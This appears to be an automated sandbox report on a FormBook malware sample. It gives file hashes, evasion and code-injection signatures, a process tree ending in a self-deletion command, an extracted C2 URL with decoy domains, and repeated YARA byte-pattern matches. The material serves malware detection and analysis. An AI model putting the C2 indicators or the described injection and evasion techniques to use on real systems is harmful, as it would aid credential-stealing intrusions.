Windows Analysis Report VJaX7U6LAp.exe

Overview

General Information

Sample Name: VJaX7U6LAp.exe
Analysis ID: 510423
MD5: 15a4b8c6607b8e67b0bba2d1b5dbd43e
SHA1: c77c0417b07c25c0e567f0d0362a8a80fc7c40e9
SHA256: c4b1789371d832969f812bd0a577e380cdac00db6775d7fc251adf8d92c15d74
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • VJaX7U6LAp.exe (PID: 6316 cmdline: 'C:\Users\user\Desktop\VJaX7U6LAp.exe' MD5: 15A4B8C6607B8E67B0BBA2D1B5DBD43E)
    • VJaX7U6LAp.exe (PID: 5088 cmdline: C:\Users\user\Desktop\VJaX7U6LAp.exe MD5: 15A4B8C6607B8E67B0BBA2D1B5DBD43E)
    • VJaX7U6LAp.exe (PID: 6284 cmdline: C:\Users\user\Desktop\VJaX7U6LAp.exe MD5: 15A4B8C6607B8E67B0BBA2D1B5DBD43E)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 5040 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 6932 cmdline: /c del 'C:\Users\user\Desktop\VJaX7U6LAp.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.zahnimplantatangebotede.com/mxwf/"], "decoy": ["orders-cialis.info", "auctionorbuy.com", "meanmugsamore.com", "yachtcrewmark.com", "sacredkashilifestudio.net", "themintyard.com", "bragafoods.com", "sierp.com", "hausofdeme.com", "anthonyjames915.com", "bajardepesoencasa.com", "marciaroyal.com", "earringlifter.com", "dsdjfhd9ddksa1as.info", "bmzproekt.com", "employmentbc.com", "ptsdtreatment.space", "vrchance.com", "cnrongding.com", "welovelit.com", "intercourierdelivery.services", "ianwhitewrite.com", "afcerd.com", "beneficiodemedicare.com", "gatel3ess.com", "salesnksportswt.top", "thewellnessloft365.com", "totensa.com", "jessicatheisen.com", "snowtographers.com", "executrainpr.com", "puttypaw.com", "popcorntimeipad.com", "heyconi.com", "llanoresources.com", "ibusinesshero.com", "1euro1ad.com", "sparkleeapp.com", "zhuxiugyh.com", "calvinmaphoto.com", "bjmaomao.com", "isaacfujiki.com", "zipwhipper.com", "kontrollstutzen.com", "hannaheason.media", "zgcbw.net", "letteringdagabi.com", "kitefabrics.com", "andherieastoffices.com", "thewellnesstravelcompany.info", "ohio.works", "beacharita.com", "alphamillls.com", "sassandvinegar.com", "usauber.com", "ceylonherbslk.com", "richardggreenhill.com", "groupdae.com", "jupiterccc.com", "indoovo.com", "sunnytheodora.com", "gxpgfz.com", "shoppandaxpress.com", "heiboard.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      4.0.VJaX7U6LAp.exe.400000.6.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        4.0.VJaX7U6LAp.exe.400000.6.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.VJaX7U6LAp.exe.400000.6.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        4.0.VJaX7U6LAp.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          4.0.VJaX7U6LAp.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: VJaX7U6LAp.exe, Virustotal: Detection: 10%
          Yara detected FormBook
          Source: Yara match, File source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.0.VJaX7U6LAp.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.0.VJaX7U6LAp.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.VJaX7U6LAp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.VJaX7U6LAp.exe.37d71e0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.VJaX7U6LAp.exe.37887c0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: VJaX7U6LAp.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: VJaX7U6LAp.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: VJaX7U6LAp.exe, 00000004.00000002.428318284.000000000165F000.00000040.00000001.sdmp, help.exe, 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: VJaX7U6LAp.exe, 00000004.00000002.428318284.000000000165F000.00000040.00000001.sdmp, help.exe
          Source: Binary string: help.pdbGCTL source: VJaX7U6LAp.exe, 00000004.00000002.428786931.0000000001910000.00000040.00020000.sdmp
          Source: Binary string: help.pdb source: VJaX7U6LAp.exe, 00000004.00000002.428786931.0000000001910000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe, Code function: 4x nop then pop ebx, 4_2_00407AFA
          Source: C:\Users\user\Desktop\VJaX7U6LAp.exe, Code function: 4x nop then pop edi, 4_2_00417D6A
          Source: C:\Windows\SysWOW64\help.exe, Code function: 4x nop then pop ebx, 11_2_00487B02
          Source: C:\Windows\SysWOW64\help.exe, Code function: 4x nop then pop edi, 11_2_00497D6A

          Networking:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Domain query: www.usauber.com
          Source: C:\Windows\explorer.exe, Domain query: www.vrchance.com
          Source: C:\Windows\explorer.exe, Domain query: www.sunnytheodora.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.zahnimplantatangebotede.com/mxwf/
          Source: explorer.exe, 00000006.00000000.399795242.000000000095C000.00000004.00000020.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: VJaX7U6LAp.exe, 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmp, String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: unknown, DNS traffic detected: queries for: www.usauber.com
          Source: VJaX7U6LAp.exe, 00000000.00000002.361662121.000000000086A000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.0.VJaX7U6LAp.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.VJaX7U6LAp.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.0.VJaX7U6LAp.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.VJaX7U6LAp.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.2.VJaX7U6LAp.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.VJaX7U6LAp.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.VJaX7U6LAp.exe.37d71e0.2.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.VJaX7U6LAp.exe.37d71e0.2.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.VJaX7U6LAp.exe.37887c0.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.VJaX7U6LAp.exe.37887c0.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.VJaX7U6LAp.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.VJaX7U6LAp.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.VJaX7U6LAp.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.VJaX7U6LAp.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.VJaX7U6LAp.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.VJaX7U6LAp.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.VJaX7U6LAp.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.VJaX7U6LAp.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.VJaX7U6LAp.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.VJaX7U6LAp.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.VJaX7U6LAp.exe.37d71e0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.VJaX7U6LAp.exe.37d71e0.2.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.VJaX7U6LAp.exe.37887c0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.VJaX7U6LAp.exe.37887c0.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
